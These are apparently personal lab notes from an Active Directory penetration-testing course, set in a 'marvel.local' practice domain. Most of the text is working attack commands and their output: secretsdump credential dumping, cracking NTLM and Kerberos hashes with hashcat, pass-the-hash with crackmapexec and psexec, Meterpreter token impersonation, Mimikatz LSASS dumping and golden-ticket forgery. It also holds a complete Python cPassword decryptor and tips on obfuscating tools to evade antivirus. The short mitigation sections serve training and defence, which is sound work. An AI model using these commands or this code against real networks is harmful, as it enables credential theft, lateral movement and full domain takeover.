- (Get-DomainPolicy)."systemaccess": In case we want to check the systemaccess policy. For example, if minimumpasswordlength is 7 this would help us to start a password spraying attack with 7 characters.
- Get-NetUser: This is a little dirty but shows us all the information about the users. Sam Accounts, descriptions, etc.
- Get-NetUser | select cn : this will pull out just the usernames
- Get-NetUser | select samaccountname: just the sam accounts.
- Get-NetUser | select description : Just gets the descriptions (good way to find pwds in descriptions)
With all the previous information we can check things like how long it takes for a password to expire, etc.
- Get-UserProperty: This will show us all the properties a user may have.
- Get-UserProperty -Properties pwdlastset: This will show when the password was last set for all users.
- Get-UserProperty -Properties logoncount: If we see users that never log in, that could be a honeypot account.
- Get-UserProperty -Properties badpwdcount: We see who gets their password wrong most frequently, or possibly dictionary attacks.
We can also get computers:
- Get-NetComputer: shows all the computers in the domain
- Get-NetComputer -FullData : This will show us more info. Operating systems etc.
- Get-NetComputer -FullData | select OperatingSystem: Shows us what are the servers, windows 10 machines etc.
We can also look at groups:
- Get-NetGroup: shows all the groups
- Get-NetGroup -GroupName “Domain Admins”: Shows all the domain admins
- Get-NetGroup -GroupName *admin*
- Get-NetGroupMember -GroupName “Domain Admins”: We get the members of the domain admins.
PowerView also has a feature: Invoke-ShareFinder
This will show all the files shared in the network and from which computer.
Group Policies:
- Get-NetGPO: This shows us all the group policies. (dirty)
- Get-NetGPO | select displayname, whenchanged: This gives us an idea of what is going on, what has been disabled, enabled, etc.
BloodHound
(https://github.com/BloodHoundAD/BloodHound) is an application used to visualize Active Directory environments. The front-end is built on Electron and the back-end is a Neo4j database; the data leveraged is pulled from a series of data collectors, also referred to as ingestors, which come in PowerShell and C# flavours.
Ingestors:
- bloodhound-python: to install, just run pip3 install bloodhound (or pip install bloodhound).
Syntax / example:
bloodhound-python -d marvel.local -u fcastle -p Password1 -gc hydra-dc.marvel.local -c all -ns 192.168.2.200
- Sharphound (written in C#):
In this example we will use sharphound.
1) Ingesting the data:
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1" -OutFile "SharpHound.ps1"
Once it is on the target machine:
2) powershell -ep bypass
3) . .\SharpHound.ps1
4) Invoke-BloodHound -CollectionMethod All -Domain Marvel.local -ZipFileName file.zip
5) Once the data is extracted, we move it to our attacker machine and input the zip file into bloodhound so it looks like this:
We can do many queries with it like:
Attacking Active Directory - Post Compromise Attacks
Post Compromise Attacks
For previous attacks we needed to have a credential for the attack to be effective.
Here we use :
- Pass the hash
- Pass the password
- Token Impersonation
- Kerberoasting
- GPP password attacks
- Golden Ticket Attacks.
Useful Tools
- Crackmapexec:
CrackMapExec (a.k.a. CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve its functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.
Although meant to be used primarily for offensive purposes (e.g. red teams), CME can be used by blue teams as well to assess account privileges, find possible misconfigurations and simulate attack scenarios.
Syntaxes:
- crackmapexec smb 192.168.2.0/24 -u fcastle -d MARVEL.local -p Password1 : to check if the same domain credentials are working on some other boxes.
- crackmapexec smb 192.168.2.0/24 -u fcastle -d MARVEL.local -p Password1 --sam : To dump SAM hashes.
- crackmapexec smb 192.168.2.0/24 -u fcastle -d MARVEL.local -p Password1 --lsa : to dump LSA hashes
- crackmapexec smb 192.168.2.0/24 -u 'Frank Castle' -d . -H 64f12cddaa88057e06a81b54e73b949b (pass the hash -- notice the -d . to authenticate locally)
- SecretDump
This is a tool to dump SAM and LSA hashes once we have a valid account on the system.
Syntaxes:
- secretsdump.py domain/user:password@ipaddress
Kerberoasting:
Syntax:
- GetUserSPNs.py <DOMAIN/username:password> -dc-ip <ip of DC> -request
If you get a clock skew error, run ntpdate <IP of DC>.
Mimikatz
• Tool used to view and steal credentials, generate Kerberos tickets, and leverage attacks.
• Dump Credentials stored in memory
• Just a few attacks: Credential Dumping, Pass-The-Hash, Over-Pass-The-Hash, Pass-The-Ticket, Golden Ticket, Silver Ticket.
Pass The Hash / Pass the Password
If we crack a password and / or can dump the SAM hashes, we can leverage both for lateral movement in networks.
We could crack the hashes and obtain passwords or just pass the hashes.
Attack Scenarios:
a) Pass the password
1) Let's say we capture the credentials for fcastle with password: Password1.
This shows that with the fcastle user we were able to access 2 computers with that username and password: “THEPUNISHER”
and “DEADPOOL”
2) Another useful option is that we can also try to dump the SAM hashes just by adding the --sam modifier at the end:
As we can see here we have local users "Frank Castle" and “Dead Pool” with their SAM hashes.
3) Similarly, if we add --lsa at the end, we get the LSA hashes:
4) With this information we can use psexec to log into the other box, 192.168.2.202 for example:
DO NOT do password spraying with domain accounts, since this could lock out users.
This works perfectly with local accounts that may have been set up on several machines, or once we are sure we have a valid password for a domain account and want to check where it works.
SecretsDump - Extracting SAM Hashes, LSA Secrets etc
SecretDump
This is a tool to dump SAM and LSA hashes once we have a valid account on the system.
Attack
Since we know that fcastle is a local admin on both the THEPUNISHER and DEADPOOL machines, we run secretsdump.py on both to extract the SAM hashes:
└──╼ $secretsdump.py marvel.local/fcastle:Password1@192.168.2.201
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x016e2d195a2db0675adff82489bc5148
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d70f0fb48151bd2b4ffee17f14fb99b0:::
Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
MARVEL\THEPUNISHER$:aes256-cts-hmacsha1-96:17239c3f701cd57e12367cb1f342659b76966971f0c35fb51347c47b0c2f6ff0
MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:62f38eebe41177089791d09747547741
MARVEL\THEPUNISHER$:des-cbc-md5:9bfb024361fea280
MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:0c5c3921c06bc38c1ef0ccdda874a93f:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x2064356a9a46521edc236b388df6e7ce55dfcdb9
dpapi_userkey:0xd6c291cd029b66853a0844330afbfa47ca6c36d4
[*] NL$KM
 0000   60 E0 01 5F 82 E8 1D 29 69 0C 0D 69 E0 3A 28 EF   `.._...)i..i.:(.
 0010   FD FD 45 10 53 59 53 7D BD 17 1A 60 34 8F 3F A2   ..E.SYS}...`4.?.
 0020   D5 D3 E7 2E A9 88 57 BC 15 31 11 55 61 09 23 8D   ......W..1.Ua.#.
 0030   A8 0F 60 0C 59 67 C7 07 DE 55 70 D2 2A F8 9C 4C   ..`.Yg...Up.*..L
NL$KM:60e0015f82e81d29690c0d69e03a28effdfd45105359537dbd171a60348f3fa2d5d3e72ea98857bc153111556109238
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
┌─[marduk@periquito]─[~/Toys/PyFuscation]
└──╼ $secretsdump.py marvel.local/fcastle:Password1@192.168.2.202
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe2d0d1ee6b5099e79155664f8f7022fe
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:dcf8ac9223a8cf57291ed6abda2bc043:::
Dead Pool:1002:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0:::
[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c
MARVEL.LOCAL/pparker:$DCC2$10240#pparker#36a5d54b17416e276a7ca65469fd56d8
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
MARVEL\DEADPOOL$:aes256-cts-hmacsha1-96:a19d8437d40449ecaccbfc12cd67775ff513ab432672fd781977ee2e71617f96
MARVEL\DEADPOOL$:aes128-cts-hmac-sha1-96:f4e09db58222ec1fa57af5ba24ceb356
MARVEL\DEADPOOL$:des-cbc-md5:badcea4c64f491d3
MARVEL\DEADPOOL$:aad3b435b51404eeaad3b435b51404ee:e386804db4c1f9282660d52e219fba2c:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x12cb07363cb99661330a2cfb448d60c1c98b88b5
dpapi_userkey:0x57bcac926451a5712a17718ec8c321ee7702a82e
[*] NL$KM
 0000   E0 F1 A9 C6 F9 1B 9F 19 1B 5D B3 21 8A C2 4D 2E   .........].!..M.
 0010   10 8E 00 95 72 90 28 97 9B 87 A9 96 2E C3 78 BA   ....r.(.......x.
 0020   62 F1 EE 40 C5 52 8A D2 5C ED 4C 2F D5 89 5C DD   b..@.R..\.L/..\.
 0030   60 48 E9 6B D3 83 EB A6 6B 41 5C 78 48 AC 2D 9A   `H.k....kA\xH.-.
NL$KM:e0f1a9c6f91b9f191b5db3218ac24d2e108e0095729028979b87a9962ec378ba62f1ee40c5528ad25ced4c2fd5895cd
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
Passing the Hash
If we crack a password and / or can dump the SAM hashes, we can leverage both for lateral movement in networks.
We could crack the hashes and obtain passwords or just pass the hashes: NTLM authentication only proves knowledge of the NT hash, so the hash itself is enough to log in.
IMPORTANT: you can pass NT hashes (from the SAM, NTDS.dit or mimikatz) but NOT the Net-NTLMv1/v2 challenge-responses captured with Responder. Those can only be cracked or relayed.
Attack Scenarios
1) As per the previous attack with secretsdump.py we were able to extract some hashes. These hashes were saved in the file sam-hashes.txt:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Dead Pool:1002:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0:::
2 ) Cracking the hashes with Hashcat (mode 1000 = NTLM):
hashcat -m 1000 sam-hashes.txt /usr/share/wordlists/rockyou.txt
└──╼ $hashcat -m 1000 sam-hashes.txt /usr/share/wordlists/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
64f12cddaa88057e06a81b54e73b949b:Password1
c39f2beb3d2ec06a62cb887fb391dee0:Password2
So we have the passwords for Frank Castle and Dead Pool. The Administrator entry "cracks" to an empty string: 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of a blank password, which on a workstation usually means the built-in Administrator is disabled and has no password set.
3 ) Let's try to pass the hash. We copy the second half (the NT hash, after the last colon) and use crackmapexec to pass it:
*** notice that we use "-d ." instead of the domain. This means authenticate as a local account.
└──╼ $crackmapexec smb 192.168.2.0/24 -u 'Frank Castle' -d . -H 64f12cddaa88057e06a81b54e73b949b
SMB  192.168.2.201  445  THEPUNISHER  [*] Windows 10.0 Build 18362 (name:THEPUNISHER) (domain:.) (signing:False) (SMBv1:False)
SMB  192.168.2.202  445  DEADPOOL     [*] Windows 10.0 Build 18362 (name:DEADPOOL) (domain:.) (signing:False) (SMBv1:False)
SMB  192.168.2.200  445  HYDRA-DC     [*] Windows 10.0 Build 17763 (name:HYDRA-DC) (domain:.) (signing:True) (SMBv1:False)
SMB  192.168.2.201  445  THEPUNISHER  [+] .\Frank Castle 64f12cddaa88057e06a81b54e73b949b
SMB  192.168.2.200  445  HYDRA-DC     [-] .\Frank Castle 64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE
SMB  192.168.2.202  445  DEADPOOL     [-] .\Frank Castle 64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE
This time it is not showing "Pwn3d!", but the [+] means the login with the hash succeeded: a valid local account on THEPUNISHER, just not an administrator there. Let's try with user "Dead Pool" (same command, with -u 'Dead Pool' and that user's NT hash):
SMB  192.168.2.200  445  HYDRA-DC     [*] Windows 10.0 Build 17763 (name:HYDRA-DC) (domain:.) (signing:True) (SMBv1:False)
SMB  192.168.2.201  445  THEPUNISHER  [*] Windows 10.0 Build 18362 (name:THEPUNISHER) (domain:.) (signing:False) (SMBv1:False)
SMB  192.168.2.200  445  HYDRA-DC     [-] .\Dead Pool c39f2beb3d2ec06a62cb887fb391dee0 STATUS_LOGON_FAILURE
SMB  192.168.2.201  445  THEPUNISHER  [-] .\Dead Pool c39f2beb3d2ec06a62cb887fb391dee0 STATUS_LOGON_FAILURE
SMB  192.168.2.202  445  DEADPOOL     [*] Windows 10.0 Build 18362 (name:DEADPOOL) (domain:.) (signing:False) (SMBv1:False)
SMB  192.168.2.202  445  DEADPOOL     [+] .\Dead Pool c39f2beb3d2ec06a62cb887fb391dee0
Same result with the 'Dead Pool' user: the hash is accepted, but only on the box where the local account exists.
Something to note:
- fcastle is a domain account that is a local admin on both THEPUNISHER and DEADPOOL (that is why secretsdump worked)
- Frank Castle is just a local user on THEPUNISHER (valid login with the hash, but no "Pwn3d!")
- Dead Pool is just a local user on DEADPOOL
Another thing: if we get the SAM hash of a local Administrator, that can be great, since the same local admin password is often set on EVERY machine before joining them to the domain, so the one hash then works everywhere (unless LAPS or unique per-host passwords are in use).
4 ) We can also use PSEXEC WITH A HASH instead of a password:
sudo psexec.py 'Frank Castle':@192.168.2.201 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b
For this one -hashes takes both halves in LMHASH:NTHASH form. The LM part is the constant empty-LM value (aad3b435b51404eeaad3b435b51404ee), since modern Windows no longer stores LM hashes.
└──╼ $sudo psexec.py 'Frank Castle':@192.168.2.201 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 192.168.2.201.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[*] Found writable share Share
[*] Uploading file NIkMVshl.exe
[*] Opening SVCManager on 192.168.2.201.....
[-] Error opening SVCManager on 192.168.2.201.....
[-] Error performing the installation, cleaning up: Unable to open SVCManager
The hash itself is accepted (the shares are enumerated and the binary is even uploaded to the open "Share"), but the install fails: psexec.py creates a service through the Service Control Manager, and that needs local admin rights. "Frank Castle" is only a normal user on THEPUNISHER (ADMIN$ and C$ not being writable is the first hint), so passing his hash gives us his access, not SYSTEM. With the hash of a local administrator the same command would drop us into a SYSTEM shell.
Mitigation Strategies
Pass Attack Mitigations
This is hard to prevent completely, but we can make it more difficult for an attacker:
• Limit account reuse:
◇ Avoid re-using the local admin password across machines (LAPS gives every host a unique, automatically rotated one)
◇ Disable the Guest and built-in Administrator accounts
◇ Limit who is a local administrator (least privilege)
• Use strong passwords:
◇ Longer than 14 characters (this also rules out LM hash storage)
◇ Avoid common words
◇ Prefer long passphrases
• Privileged Access Management (PAM):
◇ Check sensitive accounts out/in only when needed
◇ Automatically rotate passwords on check-out and check-in
◇ This limits pass attacks because the hash/password is strong and constantly rotated, so a stolen hash stops working quickly
Token Impersonation
What are tokens?
• Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file.
Think cookies for computers.
There are two types:
• Delegate - Created for logging into a machine or using Remote Desktop
• Impersonate - “Non-Interactive” such as attaching a network drive or a domain logon script.
Token Impersonation Attack with Metasploit
1) Metasploit with psexec for example:
msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.2.201    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 C$               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             MARVEL.local     no        The Windows domain to use for authentication
   SMBPass               Password1        no        The password for the specified username
   SMBUser               fcastle          no        The username to authenticate as

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.2.51     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   Native upload
msf6 exploit(windows/smb/psexec) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > load incognito
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
Font Driver Host\UMFD-2
MARVEL\Administrator
MARVEL\fcastle
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1
Window Manager\DWM-2
Impersonation Tokens Available
========================================
No tokens available
meterpreter > impersonate_token marvel\\administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > shell
Process 10476 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18363.418]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
marvel\administrator
C:\Windows\system32>
And here we are impersonating another logged-in user, the domain Administrator, without knowing their password. The token is only available because that user has a session on THEPUNISHER; once they log off it is gone.
Use rev2self to drop the impersonated token and return to the original user.
Mitigation
Token Impersonation Mitigation
• Limit user/group Token creation permissions
• Account Tiering
• Local Admin Restriction
Kerberoasting
Kerberoasting is a pervasive attack technique targeting Active Directory service account credentials. Advanced and lesser-skilled
attackers alike favor Kerberoasting because the technique can be carried out by
any user on a domain—not just administrators. It is also an “offline” attack that doesn't require any packets be sent to the
targeted service—traffic that would be logged and quite possibly trigger alerts.
Kerberoasting, instead, takes advantage of human nature nearly as much as it exploits known security weaknesses in Kerberos authentication for Active Directory. At its core, Kerberoasting is a password cracking attack: any domain user can request a service ticket (TGS) for any SPN, the ticket is encrypted with a key derived from the service account's password, and that ticket is cracked offline.
Goal: get a TGS for the service account and crack the service account's password from it offline.
Key Points
• Kerberoasting is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking.
• Kerberoasting is a common, pervasive attack that exploits a combination of weak encryption (RC4-HMAC, whose key is simply the account's NT hash) and poor service account password hygiene.
• Kerberoasting is effective because an attacker does not require domain administrator credentials to pull off this attack and can extract service account credential hashes without sending packets to the target service; the only traffic is a normal TGS-REQ to the DC.
Good resource: https://medium.com/@Shorty420/kerberoasting-9108477279cc/
Attack
1) We get the hash:
└──╼ $sudo ntpdate 192.168.2.200 ## synchronize the time with the DC: Kerberos rejects requests with more than 5 minutes of clock skew
26 Oct 02:49:16 ntpdate[16043]: adjust time server 192.168.2.200 offset +0.000120 sec
└──╼ $sudo GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip 192.168.2.200 -request
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName                    Name        MemberOf                                                     PasswordLastSet             LastLogon  Delegation
--------------------------------------  ----------  -----------------------------------------------------------  --------------------------  ---------  ----------
HYDRA-DC/SQLService.MARVEL.local:60111  SQLService  CN=Group Policy Creator Owners,OU=Groups,DC=MARVEL,DC=local  2020-10-20 23:20:55.096410  <never>

$krb5tgs$23$*SQLService$MARVEL.LOCAL$HYDRA-DC/SQLService.MARVEL.local~60111*$7812aa624ec7a647d8f5320457d94628$30e4c7f2f551d167eaeecc1aa6addd84db7ca56e35d84301530d35ed835546e3b4d88c07840bccea22bb0c7bfadc18d78f
2 ) We crack the hash. The $23$ in the hash is the Kerberos etype (23 = RC4-HMAC), which selects the hashcat mode, 13100 here:
└──╼ $hashcat --help | grep Kerberos
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth  | Network Protocols
  13100 | Kerberos 5, etype 23, TGS-REP          | Network Protocols
  18200 | Kerberos 5, etype 23, AS-REP           | Network Protocols
  19600 | Kerberos 5, etype 17, TGS-REP          | Network Protocols
  19700 | Kerberos 5, etype 18, TGS-REP          | Network Protocols
  19800 | Kerberos 5, etype 17, Pre-Auth         | Network Protocols
  19900 | Kerberos 5, etype 18, Pre-Auth         | Network Protocols
┌─[marduk@periquito]─[~/temp/UDEMY]
└──╼ $hashcat -m 13100 kerberos-hash.txt /usr/share/wordlists/rockyou.txt --force
$krb5tgs$23$*SQLService$MARVEL.LOCAL$HYDRA-DC/SQLService.MARVEL.local~60111*$7812aa624ec7a647d8f5320457d94628$30e4c7f2f551d167eaeecc1aa6addd84db7ca56e35d84301530d35ed835546e3b4d88c07840bccea22bb0c7bfadc18d78f
Password is Mypassword123#
Kerberoasting Mitigation
• Strong passwords for service accounts: long and random (25+ characters), or better, Group Managed Service Accounts (gMSA), whose 120-character passwords are rotated automatically
• Least privilege: service accounts should not be highly privileged (here SQLService is a Group Policy Creator Owner, so one cracked password gives control of GPOs)
• Prefer AES (etype 17/18) over RC4 for service accounts; AES tickets are far slower to crack
Group Policy Preferences Attacks
Group Policy Preferences (GPP) Attacks AKA MS14-025
• GPP allowed admins to create policies using embedded credentials (local users and groups, drive maps, scheduled tasks, services)
• These credentials were AES-encrypted and stored in a "cPassword" attribute in XML files under SYSVOL, which every domain user can read
• The key was accidentally released (whoops): Microsoft published it on MSDN, so anyone can decrypt every cPassword
• Patched in MS14-025, but the patch only stops admins from creating new cPassword entries; it does not remove the ones already sitting in SYSVOL
Resources: https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
Attack Vectors
a) gpp-decrypt (Kali) easily decrypts a cPassword. Look for the cpassword attribute in Groups.xml, ScheduledTasks.xml, Services.xml, Drives.xml, Printers.xml and DataSources.xml under \\<DC>\SYSVOL\<domain>\Policies.
b) Metasploit: auxiliary/scanner/smb/smb_enum_gpp searches and decrypts them over SMB with domain credentials; post/windows/gather/credentials/gpp does the same from an existing session (background the session and run the module).
Good practice: the box "Active" on HackTheBox.
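What gpp-decrypt and the Metasploit modules do under the hood is small enough to show in full. The following is an added example (my own code, not gpp-decrypt's) that decrypts a cPassword with the published key and pulls every cPassword/account pair out of a preference XML file. It needs the cryptography package (impacket already depends on it). The Groups.xml below is constructed; its cPassword is the public test vector that ships with gpp-decrypt, and the AES key is the one Microsoft published in MS-GPPREF.

```python
"""Decrypt Group Policy Preferences cPassword values (MS14-025)."""
import base64
import xml.etree.ElementTree as ET

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# The single AES-256 key Microsoft published (MS-GPPREF 2.2.1.1.4); identical in every domain.
GPP_AES_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
GPP_IV = bytes(16)  # fixed all-zero IV, so the scheme is fully deterministic


def gpp_decrypt(cpassword: str) -> str:
    """cPassword -> clear text. GPP strips the base64 '=' padding, so restore it first."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(GPP_IV)).decryptor()
    padded = dec.update(raw) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return (unpadder.update(padded) + unpadder.finalize()).decode("utf-16-le")


def gpp_encrypt(password: str) -> str:
    """The inverse, to show how an admin's password ends up in SYSVOL."""
    padder = padding.PKCS7(128).padder()
    padded = padder.update(password.encode("utf-16-le")) + padder.finalize()
    enc = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(GPP_IV)).encryptor()
    return base64.b64encode(enc.update(padded) + enc.finalize()).decode().rstrip("=")


# Attribute naming the account next to cpassword, per preference file type:
# Groups.xml/Drives.xml/Printers.xml: userName, ScheduledTasks.xml: runAs,
# Services.xml: accountName, DataSources.xml: username
_ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")


def find_gpp_creds(xml_text: str):
    """Walk one preference XML file and return [(account, clear-text password), ...]."""
    creds = []
    for el in ET.fromstring(xml_text).iter():
        cp = el.get("cpassword")
        if cp:
            account = next((el.get(a) for a in _ACCOUNT_ATTRS if el.get(a)), "<unknown>")
            creds.append((account, gpp_decrypt(cp)))
    return creds


# Constructed Groups.xml (not from the notes); the cpassword is gpp-decrypt's public test vector.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="administrator (built-in)"
        changed="2014-05-01 10:00:00">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="administrator (built-in)"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for account, password in find_gpp_creds(SAMPLE_GROUPS_XML):
        print(f"{account}: {password}")
```

Because the key and IV are fixed, the same password always yields the same cPassword, so even without decrypting you can spot identical local admin passwords across GPOs by comparing the cPassword strings.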
Mimikatz
• Tool used to view and steal credentials, generate Kerberos tickets and leverage attacks.
• Dumps credentials stored in memory (LSASS)
• Just a few attacks: Credential Dumping, Pass-The-Hash, Over-Pass-The-Hash, Pass-The-Ticket, Golden Ticket, Silver Ticket.
Invoke-Mimikatz (PowerShell, runs in memory) is an alternative since most AV will pick up the mimikatz.exe binary.
Obfuscating the binary or script is the other alternative.
Credential Dumping with Mimikatz
1 ) We load mimikatz and the rest of the files onto the victim machine and start mimikatz.exe (or Invoke-Mimikatz for PowerShell) from an elevated prompt, since reading LSASS needs local admin.
2 ) Run "privilege::debug"; it should answer Privilege '20' OK. Then dump what LSASS holds in memory with sekurlsa::logonpasswords, which prints a huge list of logon sessions.
In the lab this shows the NTLM hash of the domain Administrator who has logged on to the box, so we could PASS THE HASH with it.
Some other commands we can try to get NTLM hashes from the local SAM / LSA:
lsadump::sam
lsadump::sam /patch
lsadump::lsa /patch
Golden Ticket Attacks
Golden Ticket Attack and Pass the Ticket Attack
A golden ticket is a forged Kerberos TGT encrypted with the krbtgt account's hash. With it we have complete access to the entire domain as any user we choose, and it stays valid until the krbtgt password is changed twice.
Attack (run on the domain controller, as a domain admin):
1) We do the same first step with mimikatz.exe:
privilege::debug
2) We run the following command to dump the krbtgt account:
lsadump::lsa /inject /name:krbtgt
*** a lot of information is going to be dumped, so this is a good time to copy it all into a notepad.
3 ) From that output we need the SID of the domain and the NTLM hash of the krbtgt account. With these we can forge the golden ticket.
4) type:
kerberos::golden /User:Administratorfakeuser /domain:marvel.local /sid:S-1-5-21-942791118-1442518653-2818883610 /krbtgt:f656d85ce0d4c124e78fae6766c691de /id:500 /ptt
/id:500 is the RID of the built-in domain Administrator, so the ticket carries Administrator's identity whatever name we put in /User (the user does not even need to exist). /ptt injects the ticket into the current session (pass the ticket).
With this ticket we can access any computer we want.
5 ) We can do something like misc::cmd. This opens a new command prompt that uses the injected ticket, and from there we can run whatever we want on any computer connected to the domain, for example:
dir \\DEADPOOL\C$ shows the contents of the C drive of DEADPOOL.